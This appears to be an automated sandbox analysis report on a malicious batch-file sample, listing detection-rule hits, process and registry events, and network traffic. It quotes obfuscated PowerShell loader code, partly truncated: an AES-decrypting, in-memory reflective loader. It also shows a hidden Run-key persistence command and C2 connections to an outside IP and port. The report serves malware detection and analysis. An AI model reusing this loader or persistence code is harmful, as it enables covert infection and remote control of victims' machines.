Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oxbNdIdJMSmp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KEMhNhDQCLRUNV,[Parameter(Position=1)][Type]$HGdpxLKyUQ)$khFifhQytpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+'e'+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+[Char](111)+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$khFifhQytpa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+','+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KEMhNhDQCLRUNV).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');$khFifhQytpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',N'+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$HGdpxLKyUQ,$KEMhNhDQCLRUNV).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $khFifhQytpa.CreateType();}$KRrkXMMJHQAWa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+''+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.Un'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+'d'+''+'s'+'');$doZKqFPbZxNLSh=$KRrkXMMJHQAWa.GetMethod(''+[Char](71)+'et'+[Char](80)+'
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oxbNdIdJMSmp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KEMhNhDQCLRUNV,[Parameter(Position=1)][Type]$HGdpxLKyUQ)$khFifhQytpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+'e'+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+[Char](111)+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$khFifhQytpa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+','+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KEMhNhDQCLRUNV).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');$khFifhQytpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',N'+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$HGdpxLKyUQ,$KEMhNhDQCLRUNV).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $khFifhQytpa.CreateType();}$KRrkXMMJHQAWa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+''+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.Un'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+'d'+''+'s'+'');$doZKqFPbZxNLSh=$KRrkXMMJHQAWa.GetMethod(''+[Char](71)+'et'+[Char](80)+'
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8084, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F, ProcessId: 1352, ProcessName: schtasks.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] ('')); , CommandLine: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}f
Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7348, TargetFilename: C:\Windows\$cnt-onimai2\$cnt-CO2.bat
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows_Log
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7348, TargetFilename: C:\Windows\$cnt-onimai2\$cnt-CO2.bat
Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows_Log
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{613480bb-0e59-44d7-94a6-0c4ff8614e86}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 3268, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 912, ProcessName: svchost.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Q5N7WOpk8J.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2936, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 7348, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,33_2_00401000
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000000.1789539029.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2545069443.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000002F.00000000.1789539029.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2545069443.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000002.2547220742.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1789729656.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000002F.00000000.1789645488.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.2546134202.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F1197DD894 FindFirstFileExW,21_2_000001F1197DD894
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F1197DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001F1197DDA18
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F119D5D894 FindFirstFileExW,21_2_000001F119D5D894
Source: C:\Windows\System32\cmd.exeCode function: 21_2_000001F119D5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001F119D5DA18
Source: C:\Windows\System32\conhost.exeCode function: 22_2_00000166BE49D894 FindFirstFileExW,22_2_00000166BE49D894
Source: C:\Windows\System32\conhost.exeCode function: 22_2_00000166BE49DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_00000166BE49DA18
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A927D894 FindFirstFileExW,37_2_00000279A927D894
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A927DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,37_2_00000279A927DA18
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A92AD894 FindFirstFileExW,37_2_00000279A92AD894
Source: C:\Windows\System32\dllhost.exeCode function: 37_2_00000279A92ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,37_2_00000279A92ADA18
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D1ED894 FindFirstFileExW,38_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exeCode function: 38_2_000001CA7D21D894 FindFirstFileExW,38_2_000001CA7D21D894
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD5D894 FindFirstFileExW,39_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD8DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_0000017D2DD8DA18
Source: C:\Windows\System32\lsass.exeCode function: 39_2_0000017D2DD8D894 FindFirstFileExW,39_2_0000017D2DD8D894
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 147.185.221.21:43063
Source: Joe Sandbox ViewIP Address: 147.185.221.21 147.185.221.21
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: fixed-noon.gl.at.ply.gg
Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000027.00000002.2562894596.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753771735.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1752837446.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2565664638.0000017D2D551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000027.00000000.1753771735.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2565664638.0000017D2D551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000027.00000000.1753000627.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2563721606.0000017D2D471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000027.00000000.1753771735.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2565664638.0000017D2D551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000027.00000002.2562894596.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753771735.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1752837446.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2565664638.0000017D2D551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000027.00000000.1753000627.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2563721606.0000017D2D471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000027.00000002.2560755573.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1748299304.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753000627.0000017D2D471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000027.00000002.2562894596.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753771735.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1752837446.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2565664638.0000017D2D551000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000027.00000000.1753000627.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2563721606.0000017D2D471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000027.00000000.1753671087.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2564745063.0000017D2D493000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
